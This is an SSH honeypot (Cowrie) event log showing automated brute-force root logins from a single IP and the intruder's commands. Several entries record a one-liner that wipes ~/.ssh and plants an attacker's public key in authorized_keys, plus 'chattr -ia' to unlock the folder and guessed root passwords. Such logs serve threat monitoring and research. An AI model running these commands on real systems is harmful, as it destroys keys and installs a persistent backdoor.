{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:02:43.871114Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41130,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7e501644406","protocol":"ssh","message":"New connection: 212.227.235.229:41130 (1.2.3.4:22) [session: f7e501644406]","sensor":"my-vps","timestamp":"2025-09-08T22:02:44.373448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:44.379905Z","src_ip":"212.227.235.229","session":"f7e501644406"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:44.628258Z","src_ip":"212.227.235.229","session":"f7e501644406"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:45.099273Z","src_ip":"212.227.235.229","session":"39e1ebd1e5c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32970,"dst_ip":"1.2.3.4","dst_port":22,"session":"20179085fe87","protocol":"ssh","message":"New connection: 212.227.235.229:32970 (1.2.3.4:22) [session: 20179085fe87]","sensor":"my-vps","timestamp":"2025-09-08T22:02:45.428959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:45.429862Z","src_ip":"212.227.235.229","session":"20179085fe87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:45.758834Z","src_ip":"212.227.235.229","session":"20179085fe87"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:47.105125Z","src_ip":"212.227.235.229","session":"20179085fe87"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:47.432824Z","src_ip":"212.227.235.229","session":"20179085fe87"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:47.438030Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:50.219503Z","src_ip":"212.227.235.229","session":"f7e501644406"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:52.259981Z","src_ip":"212.227.235.229","session":"f7e501644406"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41146,"dst_ip":"1.2.3.4","dst_port":22,"session":"3813f9334d9c","protocol":"ssh","message":"New connection: 212.227.235.229:41146 (1.2.3.4:22) [session: 3813f9334d9c]","sensor":"my-vps","timestamp":"2025-09-08T22:02:52.767385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:52.768677Z","src_ip":"212.227.235.229","session":"3813f9334d9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:53.015527Z","src_ip":"212.227.235.229","session":"3813f9334d9c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:54.051965Z","src_ip":"212.227.235.229","session":"3813f9334d9c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:54.301276Z","src_ip":"212.227.235.229","session":"3813f9334d9c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:02:55.035788Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"11.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 11.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:55.036774Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.session.closed","duration":"14.4","message":"Connection lost after 14.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:55.037759Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54652,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b0a5a82d6e5","protocol":"ssh","message":"New connection: 212.227.235.229:54652 (1.2.3.4:22) [session: 2b0a5a82d6e5]","sensor":"my-vps","timestamp":"2025-09-08T22:03:10.650418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:10.651527Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:10.831136Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:03:11.595819Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:03:11.973765Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:03:11.974424Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:03:11.975456Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:12.156964Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:03:12.640084Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:03:12.640817Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:03:12.822346Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:12.823342Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54668,"dst_ip":"1.2.3.4","dst_port":22,"session":"544903102f63","protocol":"ssh","message":"New connection: 212.227.235.229:54668 (1.2.3.4:22) [session: 544903102f63]","sensor":"my-vps","timestamp":"2025-09-08T22:03:12.997914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:12.998745Z","src_ip":"212.227.235.229","session":"544903102f63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:13.178977Z","src_ip":"212.227.235.229","session":"544903102f63"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:03:13.942300Z","src_ip":"212.227.235.229","session":"544903102f63"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:15.125061Z","src_ip":"212.227.235.229","session":"544903102f63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50026,"dst_ip":"1.2.3.4","dst_port":22,"session":"e49a077fe3a7","protocol":"ssh","message":"New connection: 212.227.235.229:50026 (1.2.3.4:22) [session: e49a077fe3a7]","sensor":"my-vps","timestamp":"2025-09-08T22:03:15.310146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:15.311642Z","src_ip":"212.227.235.229","session":"e49a077fe3a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:15.491746Z","src_ip":"212.227.235.229","session":"e49a077fe3a7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:03:16.214980Z","src_ip":"212.227.235.229","session":"e49a077fe3a7"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:16.396918Z","src_ip":"212.227.235.229","session":"2b0a5a82d6e5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:16.398031Z","src_ip":"212.227.235.229","session":"e49a077fe3a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49424,"dst_ip":"1.2.3.4","dst_port":22,"session":"df4647082ca6","protocol":"ssh","message":"New connection: 212.227.235.229:49424 (1.2.3.4:22) [session: df4647082ca6]","sensor":"my-vps","timestamp":"2025-09-08T22:03:17.916033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:03:17.917022Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:03:18.227704Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.login.success","username":"root","password":"odooserver","message":"login attempt [root/odooserver] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:03:19.508855Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:03:20.194515Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:03:20.195425Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:03:20.196319Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:03:20.508060Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:03:21.146997Z","src_ip":"212.227.235.229","session":"df4647082ca6"}
